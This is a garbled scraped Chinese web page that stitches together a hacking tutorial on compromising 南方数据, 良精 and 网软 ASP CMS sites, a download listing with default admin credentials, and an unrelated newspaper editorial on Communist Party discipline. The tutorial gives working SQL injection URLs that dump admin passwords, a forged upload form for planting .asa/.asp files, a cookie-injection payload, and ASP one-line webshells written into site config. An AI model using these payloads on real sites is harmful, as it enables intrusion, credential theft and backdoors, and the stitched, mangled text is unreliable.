南方数据网站管理系统注入漏洞&后台拿WebShell
点&确定&后提示&备份数据库成功&.&不过实际文件是没有.asa的
直接访问备份后的地址,就得到一个webshell
（以上虽用网软做的后台演示，但南方和良精后台取shell都是大同小异的）​&&&&[3]&
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】软件大小：
发布者：admin
版面清新的科技管理代码.
管理员：admin
密码：hicode
管理目录：admin
后台登陆：login.asp
如果您喜欢本软件，请点击下面的按钮分享给您的朋友们，他们会感激您的。
下载栏目导航
本类下载排行南方日报：不能拿政治纪律和政治规矩当儿戏
我的图书馆
南方日报：不能拿政治纪律和政治规矩当儿戏
南方日报：不能拿政治纪律和政治规矩当儿戏
南方日报&&
由中共中央纪律检查委员会、中共中央文献研究室编辑的《习近平关于严明党的纪律和规矩论述摘编》近日已经出版发行。书中收入的200段论述，摘自习近平总书记日至日期间的讲话、文章等40多篇重要文献，其中许多论述是第一次公开发表。该书的出版，为我们在新的历史时期加强党的建设，在思想上政治上行动上同以习近平同志为总书记的党中央保持高度一致，提供了基本遵循。全省广大党员干部务必认真领会，贯彻执行，牢固树立起政治纪律和政治规矩意识。
严明党的政治纪律和政治规矩，是以习近平同志为总书记的党中央进一步从严治党和深化反腐倡廉工作提出的新的更高要求。总书记在讲话中着重指出，干部在政治上出问题，对党的危害不亚于腐败问题，有的甚至比腐败问题更严重。在政治问题上，任何人同样不能越过红线，越过了就要严肃追究其政治责任。有些事情在政治上是绝不能做的，做了就要付出代价，谁都不能拿政治纪律和政治规矩当儿戏。总书记的讲话铿锵有力，掷地有声。
政治纪律，是各级党组织和全体党员在政治方向、政治立场、政治言论和政治行为方面必须遵守的规则。党的纪律是多方面的，但政治纪律是最重要、最根本、最关键的纪律。严明党的纪律，首要的就是严明政治纪律。遵守党的政治纪律，最核心的就是坚持党的领导，坚持党的基本理论、基本路线、基本纲领、基本经验、基本要求，同党中央保持高度一致，自觉维护中央权威。这是维护党的团结统一的根本保证。
政治规矩，是习近平总书记在日十八届中央纪委第五次全会讲话中提出的新概念。什么是政治规矩？总书记归纳了四点：一是党章，二是党的纪律，三是国家法律，四是党的优良传统和工作惯例。其中，党章是党的政治总规矩，是全党必须共同遵守的根本行为规范，是党的根本大法。党纪、国法是刚性规矩，党的优良传统和工作惯例虽然是柔性的，但经过实践检验，约定俗成、行之有效。在1月16日的中央政治局常委会上，习近平总书记进一步提出：“坚持党的领导，首先是要坚持党中央的集中统一领导，这是一条根本的政治规矩。”
“欲知平直，则必准绳；欲知方圆，则必规矩。”与之相反，“没有规矩，不成方圆”。在所有党的纪律和规矩中，排在第一位的就是政治纪律和政治规矩。毋庸讳言，在现实生活中，“不守政治规矩”的还大有人在。在《习近平关于党风廉政建设和反腐败斗争论述摘编》中，总书记对这种现象进行了总结，比如在原则立场上，不守规矩主要体现为“在原则问题和大是大非面前立场摇摆”，“对涉及党的理论和路线方针政策等重大政治问题公开发表反对意见”，甚至是“对中央方针政策和重大决策部署阳奉阴违”，“口无遮拦，毫无顾忌”。又比如在党内团结方面，不守规矩的主要体现，是“团团伙伙”、小山头、小圈子、宗派主义，等等。毫无疑问，那些拿政治纪律和政治规矩当儿戏的人，最终的结局必将是“机关算尽反误了卿卿性命”。
我们党是靠革命理想和铁的纪律组织起来的马克思主义政党，纪律严明是党的光荣传统和独特优势。遵守党的政治纪律和政治规矩是无条件的。全体共产党员要对党绝对忠诚，所谓“绝对”，就是唯一的、彻底的、无条件的、不掺杂任何杂质的、没有任何水分的忠诚。要说到做到，有纪必执，有违必查。如果我们党的政治纪律和政治规矩成为摆设，就会形成“破窗效应”，使党的章程、原则、制度、部署丧失严肃性和权威性，党就会沦为各取所需、自行其是的“私人俱乐部”，就会失去战斗力，党的政治理想和政治目标也就无从谈起。
我们已经行进在全面建成小康社会决胜阶段的征途中。党面临的形势越复杂、肩负的任务越艰巨，就越要加强纪律建设，越要维护党的团结统一，确保全党统一意志、统一行动、步调一致前进。广东广大党员尤其是领导干部，一定遵守政治纪律和政治规矩，在任何时候任何情况下都必须维护党中央权威，与党中央在政治上高度统一、在行动上步调一致，团结带领全省人民夺取率先全面建成小康社会的新胜利。
(责任编辑：董晓伟)
发表评论：
TA的最新馆藏对于南方数据、良精、网软等cms的入侵做个总结
南方数据：1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7直接暴管理员帐号密码(md5)2.登陆后台3.利用编辑器上传:访问admin/southidceditor/admin_style.asp修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.&上传的，注册用户（没遇到过这类，大部分遇到的是 upfile_photo.asp，用管理员cookies上传）1、通过upfile_other.asp漏洞文件直接取SHELL 直接打开userreg.asp进行注册会员，进行登录，（在未退出登录的状态下）使用本地上传文件进行上传代码如下： &HTML&&HEAD&&& &META http-equiv=Content-Type content=&text/ charset=gb2312&&&& &STYLE type=text/css&BODY {FONT-SIZE: 9 BACKGROUND-COLOR: #e1f4ee}&& .tx1 {&& BORDER-RIGHT: # BORDER-TOP: # FONT-SIZE: 9 BORDER-LEFT: # COLOR: #0000 BORDER-BOTTOM: # HEIGHT: 20px&& }&& &/STYLE& &/HEAD&&& &BODY leftMargin=0 topMargin=0&&& &FORM name=form1 action=&/upfile_other.asp&; method=post encType=multipart/form-data&&INPUT class=tx1 type=file size=30 name=FileName&&INPUT class=tx1 type=file size=30 name=FileName1&&INPUT xxxxx=&BORDER-RIGHT: rgb(88,88,88) 1 BORDER-TOP: rgb(88,88,88) 1 FONT-WEIGHT: FONT-SIZE: 9 BORDER-LEFT: rgb(88,88,88) 1 LINE-HEIGHT: BORDER-BOTTOM: rgb(88,88,88) 1 FONT-STYLE: FONT-VARIANT: normal& type=submit value=上传 name=Submit&&& &INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID& &/FORM&&/BODY&&/HTML& 将以上代码保存为yingzi001.html，替换action网址，第一个框里选择图片文件，第二个框选择asa或asp文件上传（后面需要加一个空格，貌似在IE8中进行使用不能后面加空格，加空格时就弹出选择文件对话框，我是找不到解决办法）。 注：此方法通杀南方数据、良精系统、网软天下等 2、通过注入秒杀管理员帐号密码，使用如下：
以上代码直接暴管理员帐号和密码，取SHELL方法如下： 在网站配置[/admin/SiteConfig.asp]的版权信息里写入 &%&&%eval(request(chr(35)))%&&%& 成功把shell写入 这里一句话chr(35)密码是&#& 3、cookie注入 清空地址栏，利用union语句来注入，提交： javascript:alert(document.cookie=&id=&+escape(&1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin&)) 或者使用寂寞的刺猬工具&cookie注入中转&方便又迅速 三、后台取SHELL方法总结 （1）在系统管理中的网站配置中插入一句话马：进入后台后,点左边的&系统管理&再点击&网站配置&在右边的&网站名称&(也可以在其它处)后加入&%&&%Eval(Request(chr(112)))%&&%&，再点保存配置，如图： 然后我们打开inc/config.asp文件，看到一句话马已写入到配置文件中了， 这时再打开一句话马的客户端,提交同样得到一个小马 后台上传漏洞,Upfile_Photo.asp，获取cookies，然后旁注后台备份,直接在&产品管理&下的添加产品中上传jpg后缀的asp马,再到&系统管理&下的数据库备份,在&当前数据库路径&栏填入上传的路径,在& 备份数据库名称&填入你要备份马的名称,不过系统会在名称后自动添加上.asa的 点&确定&后提示&备份数据库成功&.&&大部分是转载的，自己又修改、添加了部分。。
分类：| 发布：| 查看： | 发表时间：
原创文章如转载，请注明：转载自影子的网站　
本文链接：&&&欢迎下载良精免费版网站管理系统
Powered By
企业建站程序员交流QQ群6958596}